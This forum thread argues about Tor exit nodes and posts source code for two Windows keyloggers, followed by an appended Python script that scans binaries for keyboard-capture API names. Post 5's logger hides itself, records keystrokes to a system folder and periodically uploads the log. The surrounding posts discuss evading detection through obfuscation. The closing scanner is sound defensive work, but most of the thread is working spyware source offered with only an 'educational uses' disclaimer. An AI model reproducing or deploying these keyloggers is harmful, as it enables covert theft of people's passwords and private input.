TheRatherOdd1

  1. At least I don't resort to name calling, jeez. Who's the troll? If you're worried about people using your network then don't be an exit node. But then you're probably transmitting child porn in TOR and would never realize it. The great thing about running an exit node is plausible deniability.
  2. @Mr-Protocol: If you're having issues with people using your network to send spam, why do you by default allow no ports except 80 (HTTP), 443 (HTTPS), 23 (SSH) etc.? Wouldn't that take care of your problem? I don't see why you whine when you are running a proxy service and it's being abused. There are some things that are different about library computers. 1.) It's open to the public for anyone to use. 2.) Usually there is no form of validation (see above) of said computer users. 3.) Libraries are part of the government and different rules apply to their computers. Something to think about in today's news is that Google is in hot water for supposedly capturing data off unencrypted wifis. So suppose you're Google and your end node is someone else's wifi... [EDIT] Also don't try and prove a point and then call to moderators to lock the discussion. It's underhanded and just makes you look bad because after all we're all being sensible, right? This still has a little bit in common with the posts above about sniffing authentications from World of Warcraft.
  3. Oh, forgot to mention the two key-loggers above only work with Windows. I'm not exactly sure what the API is for capturing keys in Linux or Mac. Rarely ever would you get infected with one on those systems unless you got pwned by a 0-day or were just plain stupid to run an untrusted program as root.
  4. 
     ```cpp
     #define _WIN32_WINNT 0x1337
     #include <fstream>
     #include <windows.h>

     using namespace std;

     HHOOK keyboardHook;

     LRESULT CALLBACK keyboardHookProc(int nCode, WPARAM wParam, LPARAM lParam) {
         PKBDLLHOOKSTRUCT p = (PKBDLLHOOKSTRUCT) (lParam);

         // If key is being pressed
         if (wParam == WM_KEYDOWN) {
             ofstream out("keys.txt", ios::app);
             switch (p->vkCode) {
                 // Invisible keys
                 case VK_CAPITAL:  out << "[CAPLOCK]"; break;
                 case VK_LSHIFT:   out << "[LSHIFT]";  break;
                 case VK_RSHIFT:   out << "[RSHIFT]";  break;
                 case VK_LCONTROL: out << "[LCTRL]";   break;
                 case VK_RCONTROL: out << "[RCTRL]";   break;
                 case VK_INSERT:   out << "[INSERT]";  break;
                 case VK_END:      out << "[END]";     break;
                 case VK_PRINT:    out << "[PRINT]";   break;
                 case VK_DELETE:   out << "[DEL]";     break;
                 case VK_BACK:     out << "[BK]";      break;
                 case VK_LEFT:     out << "[left]";    break;
                 case VK_RIGHT:    out << "[right]";   break;
                 case VK_UP:       out << "[UP]";      break;
                 case VK_DOWN:     out << "[DOWN]";    break;
                 // Visible keys
                 default:
                     out << "[" << char(p->vkCode) << "]";
             }
             out.close();
         }
         return CallNextHookEx(NULL, nCode, wParam, lParam);
     }

     void keepAlive() {
         MSG message;
         while (GetMessage(&message,NULL,0,0)) {
             TranslateMessage( &message );
             DispatchMessage( &message );
         }
     }

     int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nShowCmd) {
         keyboardHook = SetWindowsHookEx(WH_KEYBOARD_LL, keyboardHookProc, hInstance, 0);
         keepAlive();
         UnhookWindowsHookEx(keyboardHook);
         return 0;
     }
     ```

     This key-logger goes about logging keys in an entirely different manner. It inserts an application-defined hook procedure into the hook chain. This one so happens to detect keyboard inputs. Using this style of hooks we can intercept keys and block them, or intercept the mouse messages. You can even intercept window messages and see messages in the queue. As long as the hook passes the messages it captures efficiently, and is unhooked when the program is terminated, this can be a very efficient way to capture keys.
For example, while playing WoW you can have a hook listen for certain keys to control the volume of your audio player or do other things when certain keys are pressed. You can even modify what keys are captured and return totally different keys. Like if a user presses K, the user would see the key U was pressed. Because of this you can potentially do some weird and funny stuff to your system, so be careful. Most people think that you have to have a DLL to use SetWindowsHookEx, but as demonstrated in the above program this is not so. As long as the program you are using to create hooks can use pointers, you don't have to have a DLL. Though I wouldn't recommend trying to do this in interpreted languages like C# or VisualBasic.net because of possible errors.
  5. I'll go ahead and post the source code of two different types of keyloggers.

     ```cpp
     #include <iostream>
     #include <fstream>
     #include "kekke.h"
     #include <conio.h>

     using namespace std;

     int main(int argc, char *argv[])
     {
         short character;
         //Declarations
         int count = 0;
         string log = "C:\\WINDOWS\\";
         TCHAR infoBuf[50];
         //Getting computername
         DWORD bufCharCount = 50;
         GetComputerName(infoBuf, &bufCharCount);
         string loc = infoBuf;
         string los = ".log";
         string tot = log + loc + los;
         hide();
         ofstream temp;
         while(1) // main loop
         {
             count++;
             //send us the log sometimes..
             if(count == 3000)
             {
                 count = 0;
                 upload(tot);
             }
             Sleep(10);
             for(character = 8; character <= 222; character++) // Logging keys
             {
                 if(GetAsyncKeyState(character)==-32767)
                 {
                     if(character >=39 && character <=64 )
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << char(character);
                         temp.close();
                     }
                     else if(character > 64 && character < 91)
                     {
                         temp.open(tot.c_str(), ios::app);
                         character+=32;
                         temp << char(character);
                         temp.close();
                     }
                     else if(character == VK_RETURN)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << "\nENTER ";
                         temp.close();
                     }
                     else if(character == VK_SPACE)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << " ";
                         temp.close();
                     }
                     else if(character == VK_CONTROL)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << "\nCTRL ";
                         temp.close();
                     }
                     else if(character == VK_SHIFT)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << "\nSHIFT ";
                         temp.close();
                     }
                     else if(character == VK_BACK)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << "!";
                         temp.close();
                     }
                     else if(character == VK_TAB)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << "\n";
                         temp.close();
                     }
                     else if(character == VK_OEM_PERIOD)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << ".";
                         temp.close();
                     }
                     else if(character == VK_OEM_MINUS)
                     {
                         temp.open(tot.c_str(), ios::app);
                         temp << "-";
                         temp.close();
                     }
                 }
             }
         }
         return 0;
     }
     ```

     This is a GetAsyncKeyState keylogger. It hammers the API thousands of times a second to capture keys.
It can cause high CPU usage if not throttled correctly, and can potentially miss keys if the system is being bogged down by other programs. Also, since it uses the API it's fairly easy to detect unless the API call in the binary and in memory is obfuscated. This is one of the easier keyloggers to create and use. (Note) The header is missing and it seems that was the part used by this program to send logs. For educational uses only please.
  6. You should ask yourself why are you letting port 25 or 143 out as an exit node in the Tor network? Don't they (TOR) specifically say it's not recommended to allow those ports because of spam issues? On top of that here is something that is pertinent to our above discussion. Interesting, eh? Does that mean someone will waste their time to track you down? Unlikely. So there are some big risks involved....
  7. Sadly, places like Jotti and Virusscan are the perfect places for an antivirus company to run a honeypot. I mean, how many people upload malware to those sites to prove they are not detected? Then after a week or two they are suddenly detected. Same with sandboxes like Anubis.
  8. Any other laws you broke you would like to confess to?
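
Post 5 notes that a GetAsyncKeyState logger is easy to detect unless the API name is obfuscated, and post 4 relies on SetWindowsHookEx. The following is an added triage example, not code from the posts: it searches a binary's bytes for those API names, plain or under a single-byte XOR. The function names, the extra GetKeyboardState indicator and the sample byte strings are assumptions constructed for illustration.

```python
# Real user32.dll keyboard-capture API names: the two the posts use, plus
# GetKeyboardState (a related polling call, added here as an assumption).
INDICATORS = {
    "polling": ("GetAsyncKeyState", "GetKeyboardState"),
    "hook": ("SetWindowsHookEx",),  # prefix of the ...ExA / ...ExW exports
}

def xor(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)

def scan(data: bytes) -> dict:
    """Map technique -> [(api, encoding, xor_key)] for every name found.

    xor_key 0 is a plain-text hit; any other key means the name was stored
    under single-byte XOR, the simplest form of the obfuscation mentioned.
    """
    hits = {}
    for technique, names in INDICATORS.items():
        for name in names:
            for enc in ("ascii", "utf-16-le"):
                needle = name.encode(enc)
                for key in range(256):
                    if xor(needle, key) in data:
                        hits.setdefault(technique, []).append((name, enc, key))
    return hits

def verdict(data: bytes) -> str:
    hits = scan(data)
    if not hits:
        return "no keyboard-capture API names found"
    hidden = any(key for found in hits.values() for _, _, key in found)
    return "/".join(sorted(hits)) + (" (XOR-obfuscated name)" if hidden else "")

# Constructed samples: byte strings shaped like PE import-name entries,
# not taken from any real binary.
POLLER = b"\x3a\x01GetAsyncKeyState\x00USER32.dll\x00"
HOOKER = b"\x7f\x02SetWindowsHookExA\x00\x1b\x00CallNextHookEx\x00USER32.dll\x00"
HIDDEN = b"MZ\x90\x00" + xor(b"GetAsyncKeyState\x00", 0x5A) + b"\x00\x00"
CLEAN = b"\x11\x02GetMessageA\x00USER32.dll\x00"

if __name__ == "__main__":
    for label, blob in [("POLLER", POLLER), ("HOOKER", HOOKER),
                        ("HIDDEN", HIDDEN), ("CLEAN", CLEAN)]:
        print(label, "->", verdict(blob))
```

A hit is a reason to look closer, not a verdict: hotkey utilities and accessibility tools import the same calls, and names resolved at run time by stronger encodings will not match.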